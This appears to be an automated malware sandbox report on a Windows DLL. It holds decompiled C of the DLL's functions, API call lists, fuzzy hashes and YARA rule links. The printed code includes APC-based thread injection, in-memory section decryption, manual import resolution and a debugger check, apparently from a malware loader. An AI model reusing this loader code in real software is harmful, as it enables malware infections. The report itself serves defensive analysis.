					_t10 = InterlockedDecrement(0x6d484108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6d48410c;
						if( *0x6d48410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6d484118;
								if( *0x6d484118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6d48410c);
						}
						HeapDestroy( *0x6d484110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6d484108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6d484110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6d484130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6D48179C(E6D48173D, E6D481C6E(_a12, 1, 0x6d484118, _t41));
							 *0x6d48410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6d481f59
0x6d481f65
0x6d481f67
0x6d481f6a
0x6d481fe0
0x6d481fe6
0x6d481fe8
0x6d481fea
0x6d481ff0
0x6d481ff2
0x6d481ff7
0x6d481ffa
0x6d482005
0x6d482007
0x00000000
0x00000000
0x6d482009
0x6d48200c
0x6d48200e
0x00000000
0x00000000
0x00000000
0x6d48200e
0x6d482016
0x6d482016
0x6d482022
0x6d482022
0x6d481f6c
0x6d481f6d
0x6d481f8d
0x6d481f93
0x6d481f98
0x6d481f9a
0x6d481fd6
0x6d481fd6
0x6d481f9c
0x6d481fa4
0x6d481fab
0x6d481fb5
0x6d481fc1
0x6d481fc6
0x6d481fcd
0x6d481fd2
0x00000000
0x6d481fd2
0x6d481fcd
0x6d481f9a
0x6d481f6d
0x6d48202f

APIs

InterlockedIncrement.KERNEL32(6D484108), ref: 6D481F78
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6D481F8D

Part of subcall function 6D48179C: CreateThread.KERNELBASE(00000000,00000000,00000000,?,6D484118,6D481FC6), ref: 6D4817B3
Part of subcall function 6D48179C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D4817C8
Part of subcall function 6D48179C: GetLastError.KERNEL32(00000000), ref: 6D4817D3
Part of subcall function 6D48179C: TerminateThread.KERNEL32(00000000,00000000), ref: 6D4817DD
Part of subcall function 6D48179C: CloseHandle.KERNEL32(00000000), ref: 6D4817E4
Part of subcall function 6D48179C: SetLastError.KERNEL32(00000000), ref: 6D4817ED

InterlockedDecrement.KERNEL32(6D484108), ref: 6D481FE0
SleepEx.KERNEL32(00000064,00000001), ref: 6D481FFA
CloseHandle.KERNEL32 ref: 6D482016
HeapDestroy.KERNEL32 ref: 6D482022

Memory Dump Source

Source File: 00000000.00000002.909910325.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000000.00000002.909897019.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909931853.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909941537.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909962633.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 4f3afa6cd338eb05a77860b71116751e581259bb60ebc7e72010dc70a528a772
Instruction ID: 9b82ad71768e993088b55a44a3d5421c39fe4f20548c8f34d99de5f742f4d17c
Opcode Fuzzy Hash: 4f3afa6cd338eb05a77860b71116751e581259bb60ebc7e72010dc70a528a772
Instruction Fuzzy Hash: 92218475500246ABCB11AF69C88CF2977B9F76B7E7720452EE619D2242D734CD04DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6D48179C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D48179C(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6d484140, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6d4817b3
0x6d4817b9
0x6d4817bd
0x6d4817c8
0x6d4817d0
0x6d4817d9
0x6d4817dd
0x6d4817e4
0x6d4817eb
0x6d4817ed
0x6d4817f3
0x6d4817d0
0x6d4817f7

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,6D484118,6D481FC6), ref: 6D4817B3
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6D4817C8
GetLastError.KERNEL32(00000000), ref: 6D4817D3
TerminateThread.KERNEL32(00000000,00000000), ref: 6D4817DD
CloseHandle.KERNEL32(00000000), ref: 6D4817E4
SetLastError.KERNEL32(00000000), ref: 6D4817ED

Memory Dump Source

Source File: 00000000.00000002.909910325.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000000.00000002.909897019.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909931853.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909941537.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909962633.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 23281038aec7917ac3aa1cd40d4c992955b8a2baf9e34903058560d1ddd67682
Instruction ID: 7e9d12a3b4e70d23ebadf07a27c9b4e71b9efa0d5d547ea5b8de9573c41a348b
Opcode Fuzzy Hash: 23281038aec7917ac3aa1cd40d4c992955b8a2baf9e34903058560d1ddd67682
Instruction Fuzzy Hash: 2FF03A32104661FBDB116FA08C4CF9FBA79FB0B682F10440CFA15E1144C721CC009BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4810E8, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6D4810E8(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x6d484130;
				_t50 = E6D481B4C(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x6d484140;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x6d4851a7; // 0x823db7e6
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x6d484140 = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

0x6d4810ef
0x6d4810ff
0x6d481104
0x6d481109
0x6d48111e
0x6d481125
0x6d48112a
0x6d48113b
0x6d48113e
0x6d481144
0x6d481146
0x6d48114b
0x6d481227
0x6d481151
0x6d481151
0x6d481155
0x6d4811ed
0x6d48115b
0x6d48115c
0x6d481161
0x6d481164
0x6d481167
0x6d481167
0x6d48116e
0x6d481171
0x6d481179
0x6d48117a
0x6d48117b
0x6d481182
0x6d481186
0x6d48118c
0x6d481190
0x6d481192
0x6d481196
0x6d481199
0x6d4811a0
0x6d4811a3
0x6d4811a6
0x6d4811ab
0x6d4811c1
0x6d4811ad
0x6d4811b7
0x6d4811b9
0x6d4811bc
0x6d4811bc
0x6d4811c8
0x6d4811c8
0x6d4811c8
0x6d4811a0
0x6d4811d3
0x6d4811d6
0x6d4811d9
0x6d4811e0
0x6d4811e6
0x6d4811ea
0x6d4811f9
0x6d48120e
0x6d4811fb
0x6d481204
0x6d481209
0x6d48121f
0x6d48121f
0x6d48122e
0x6d481234

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6D48113E
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6D481204
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6D48121F

Strings

May 5 2021, xrefs: 6D481171

Memory Dump Source

Source File: 00000000.00000002.909910325.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000000.00000002.909897019.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909931853.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909941537.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909962633.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: May 5 2021
API String ID: 4010158826-1965333733
Opcode ID: 28e28f16a3ea9060abcf0ce788b358c9066dda156edc0e3159add9d03a6cfda4
Instruction ID: 8c8d186ad85af023315d78354dcf8fcc76f763af936e282344e4f0b5865b4554
Opcode Fuzzy Hash: 28e28f16a3ea9060abcf0ce788b358c9066dda156edc0e3159add9d03a6cfda4
Instruction Fuzzy Hash: 68414A71E0021A9BDB01CF98C884FEEBBB6BF49395F24812AD910B7245C774EE05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D48173D, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D48173D(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6D481237(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6d481746
0x6d48174b
0x6d481759
0x6d48175e
0x6d48175e
0x6d481764
0x6d481769
0x6d48176d
0x6d481771
0x6d481771
0x6d48177b
0x6d481784

APIs

GetCurrentThread.KERNEL32 ref: 6D481740
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6D48174B
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6D48175E
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6D481771

Memory Dump Source

Source File: 00000000.00000002.909910325.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000000.00000002.909897019.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909931853.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909941537.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909962633.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: e6c6d8cecafaf4e8bba2429ef74a118091d9467bf314396ed54e8f9a2f483b77
Instruction ID: 8348f1be08879e35ce2a24a4a50605f526c45c0875d5f95b26f9d6f231f7bf9b
Opcode Fuzzy Hash: e6c6d8cecafaf4e8bba2429ef74a118091d9467bf314396ed54e8f9a2f483b77
Instruction Fuzzy Hash: 6EE065312062515BAA017A2D4C88F6B666CDF972F6711422AF521D22D1CB50CC0185A6

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BFB70, Relevance: 4.7, APIs: 3, Instructions: 242COMMON

Download Yara Rule

APIs

SetConsoleOutputCP.KERNELBASE(000004E3,6D4F35D0,?,?,?,?), ref: 6D4BFBC6
SetConsoleCP.KERNELBASE(000004E3,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6D4C1971), ref: 6D4BFC8D
GetCurrentDirectoryW.KERNEL32(00000869,6D50A9E0,?), ref: 6D4BFD2E

Memory Dump Source

Source File: 00000000.00000002.909995385.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: Console$CurrentDirectoryOutput
String ID:
API String ID: 487666016-0
Opcode ID: 6dc13189f015f00eebbfc16d4560927d349de33983fc4ff2a4e2ceaadcbdd6bb
Instruction ID: fbf5b7ebfbf33a1d756461a672034214f8c22e496ab43e269768beebeca26841
Opcode Fuzzy Hash: 6dc13189f015f00eebbfc16d4560927d349de33983fc4ff2a4e2ceaadcbdd6bb
Instruction Fuzzy Hash: D291C375A022419FDB14EF3CE98CB6577B1E7C6308F10412EDA0A877A9D731DD258BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B7FA0, Relevance: 1.7, APIs: 1, Instructions: 161COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(000000FF,6D50B428,0000311C,00000040,6D509B0C), ref: 6D4B8058

Memory Dump Source

Source File: 00000000.00000002.909995385.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: eef6b1005a04298ed848de532f2811f9f11fbef91e0681cd9eeef86679110bd4
Instruction ID: 487a36b532bfdd427ee68ed0d787f05b36295dbfacdcc496692e6681478fb3e4
Opcode Fuzzy Hash: eef6b1005a04298ed848de532f2811f9f11fbef91e0681cd9eeef86679110bd4
Instruction Fuzzy Hash: BF81ADB0501101AFCB18EF29E998B25BBB1EBCA308704811BD6498736DD734ED64CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C1BB1, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6D4C173D,?), ref: 6D4C1BC6

Memory Dump Source

Source File: 00000000.00000002.909995385.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: fb086f731d6cb7e28a8210056469427ca31798db54b318ede1e4257a0936c9fc
Instruction ID: 6a9c0fe6a87f4b6d2a388227e78dbbbf188d0283ad96b214e1b15cc7f6e83bca
Opcode Fuzzy Hash: fb086f731d6cb7e28a8210056469427ca31798db54b318ede1e4257a0936c9fc
Instruction Fuzzy Hash: 33D0A73A954345AEDF006E715C08B763BFCD3867A9F10443AF90CC6540F770C980C900

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C30B2, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMT ref: 6D4C30B4

Part of subcall function 6D4C3040: RtlEncodePointer.NTDLL(00000000,?,6D4C30B9,00000000,6D4C6D8F,6D50B748,00000000,00000314,?,6D4C2D8E,6D50B748,6D4EF8D0,00012010), ref: 6D4C30A7

Memory Dump Source

Source File: 00000000.00000002.909995385.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: EncodePointer__encode_pointer
String ID:
API String ID: 4150071819-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 4ef27ef414bc5da98cb46c8f216cdc732e791d1c7e4a183397fc50976256fa2f
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D4C150C, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6D4C56C7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D4C56DC
UnhandledExceptionFilter.KERNEL32(6D4EFA48), ref: 6D4C56E7
GetCurrentProcess.KERNEL32(C0000409), ref: 6D4C5703
TerminateProcess.KERNEL32(00000000), ref: 6D4C570A

Memory Dump Source

Source File: 00000000.00000002.909995385.000000006D490000.00000020.00020000.sdmp, Offset: 6D490000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8a1b9f0efcb6e64b3d1f0511ba6a4a0ca3f5118cb068fada8b633b5996ab6736
Instruction ID: 7c0c4fbb1f20df1c401e67a8bd1eefa13e2ee3a66680de7b1e357c40671989d4
Opcode Fuzzy Hash: 8a1b9f0efcb6e64b3d1f0511ba6a4a0ca3f5118cb068fada8b633b5996ab6736
Instruction Fuzzy Hash: 1D21E2B8904204DFCF01FF25D588B563BB4FB6A305F52805EE50987B58EBB59981CF45

Uniqueness

Uniqueness Score: -1.00%

Function 6D481CDD, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D481CDD() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6d484130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6d48413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6d48412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6d484128 = _t5;
						 *0x6d484130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6d484124 = _t6;
						if(_t6 == 0) {
							 *0x6d484124 =  *0x6d484124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x6d481cde
0x6d481cec
0x6d481cf2
0x6d481cf9
0x6d481d50
0x6d481d50
0x6d481cfb
0x6d481d03
0x6d481d10
0x6d481d10
0x6d481d4c
0x6d481d4e
0x00000000
0x00000000
0x00000000
0x6d481d05
0x6d481d0c
0x6d481d12
0x6d481d12
0x6d481d17
0x6d481d25
0x6d481d2a
0x6d481d30
0x6d481d36
0x6d481d3d
0x6d481d3f
0x6d481d3f
0x6d481d49
0x6d481d0e
0x6d481d0e
0x00000000
0x6d481d0e
0x6d481d0c

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D481243,73B763F0), ref: 6D481CEC
GetVersion.KERNEL32 ref: 6D481CFB
GetCurrentProcessId.KERNEL32 ref: 6D481D17
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D481D30

Memory Dump Source

Source File: 00000000.00000002.909910325.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000000.00000002.909897019.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909931853.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909941537.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909962633.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 117733e475db13fee8be219c2d5c7092c6d761a40458427325c2cdd2ee49a0e0
Instruction ID: 9178afa898cb8050c4f64e12127543f316ac08763d2ddb2a3079fa9967190dc5
Opcode Fuzzy Hash: 117733e475db13fee8be219c2d5c7092c6d761a40458427325c2cdd2ee49a0e0
Instruction Fuzzy Hash: AAF031319443519BDF10BF68A85DB953BFAA70B7D3F20011EE555DA2C8E760DC418B58

Uniqueness

Uniqueness Score: -1.00%

Function 6D4817FA, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4817FA(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6d484140;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6d4817fa
0x6d481803
0x6d481808
0x6d48180e
0x6d481817
0x6d48181d
0x6d48181f
0x6d481822
0x6d481827
0x6d48182e
0x6d48182e
0x6d481832
0x6d481838
0x6d48183d
0x00000000
0x00000000
0x6d481843
0x6d48184d
0x6d48184f
0x6d481852
0x6d481855
0x6d481859
0x6d481861
0x6d481863
0x6d481866
0x6d4818ce
0x6d4818ce
0x6d4818d2
0x00000000
0x00000000
0x6d48186b
0x6d481871
0x6d481873
0x6d481886
0x6d481889
0x6d481889
0x6d481889
0x6d48188d
0x6d481875
0x6d481875
0x6d48187d
0x6d48187f
0x00000000
0x00000000
0x00000000
0x00000000
0x6d48187f
0x6d48186d
0x6d48186d
0x6d481881
0x6d481881
0x6d481881
0x6d481890
0x6d481893
0x6d481895
0x6d48189c
0x6d481897
0x6d481897
0x6d481897
0x6d4818a4
0x6d4818aa
0x6d4818ac
0x6d4818dc
0x6d4818ae
0x6d4818ae
0x6d4818b1
0x6d4818b3
0x6d4818bb
0x6d4818bb
0x6d4818c0
0x6d4818c2
0x6d4818c9
0x6d4818cb
0x6d4818cb
0x6d4818cb
0x00000000
0x6d4818cb
0x00000000
0x6d4818ac
0x6d48185b
0x6d48185b
0x6d48185f
0x00000000
0x00000000
0x6d48185f
0x6d4818df
0x6d4818df
0x6d4818e6
0x6d4818eb
0x00000000
0x00000000
0x6d4818f1
0x6d4818fc
0x00000000
0x6d4818fc
0x6d4818f3
0x6d4818f3
0x6d4818f9
0x00000000
0x6d4818f9
0x6d481827
0x6d4818fd
0x6d481902

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6D481832
GetProcAddress.KERNEL32(?,00000000), ref: 6D4818A4

Memory Dump Source

Source File: 00000000.00000002.909910325.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000000.00000002.909897019.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909931853.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.909941537.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.909962633.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 852fc9bbe94f4889325b117b87fe751f3a2e5f72cbf6aff7bc24b8d56e245c71
Instruction ID: f4b99e09131a243fe68275f91f2e6e7036068631ba7a0a037f8754446140ea52
Opcode Fuzzy Hash: 852fc9bbe94f4889325b117b87fe751f3a2e5f72cbf6aff7bc24b8d56e245c71
Instruction Fuzzy Hash: 4C311775E0020A9FDB05CF59C886EAAB7F9BF05395F20406AD8A1E7342E770DE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4823A5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4823A5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6d484178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6d4841c0 = 1;
